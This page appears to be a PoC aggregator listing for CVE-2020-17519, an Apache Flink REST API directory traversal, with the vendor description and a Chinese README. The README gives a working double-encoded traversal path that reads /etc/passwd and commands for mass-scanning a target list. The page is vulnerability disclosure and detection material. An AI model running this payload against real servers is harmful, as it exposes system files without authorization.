CVE-2020-17519 PoC — Apache Flink directory traversal attack: reading remote files through the REST API

Source

https://github.com/yaunsky/CVE-2020-17519-Apache-Flink

Associated Vulnerability

Title:Apache Flink directory traversal attack: reading remote files through the REST API (CVE-2020-17519)
Description:A change introduced in Apache Flink 1.11.0 (and released in 1.11.1 and 1.11.2 as well) allows attackers to read any file on the local filesystem of the JobManager through the REST interface of the JobManager process. Access is restricted to files accessible by the JobManager process. All users should upgrade to Flink 1.11.3 or 1.12.0 if their Flink instance(s) are exposed. The issue was fixed in commit b561010b0ee741543c3953306037f00d7a9f0801 from apache/flink:master.

Description

CVE-2020-17519; Apache Flink 任意文件读取; 批量检测

Readme

## CVE-2020-17519 Apache Flink 任意文件读取

### 影响范围

Apache Flink 1.5.1 ~ 1.11.2

POC

`/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd`

### 脚本使用方法

python3 CVE-2020-17519 --help  查看使用帮助

python3 CVE-2020-17519 -u http://127.0.0.1:8080 检测某个地址是否存在漏洞

python3 CVE-2020-17519 -f target.txt	批量检测漏洞

### 免责声明

由传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失，均由使用者本人负责，作者不为此承担任何责任。

File Snapshot


 [4.0K]  /data/pocs/d4a8610b487d7996ca3d538d4ff54c8e1a0c379c
├── [2.6K]  CVE-2020-17519.py
├── [ 623]  README.md
└── [  22]  target.txt

0 directories, 3 files

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.

View subscription plans →

Goal Reached Thanks to every supporter — we hit 100%!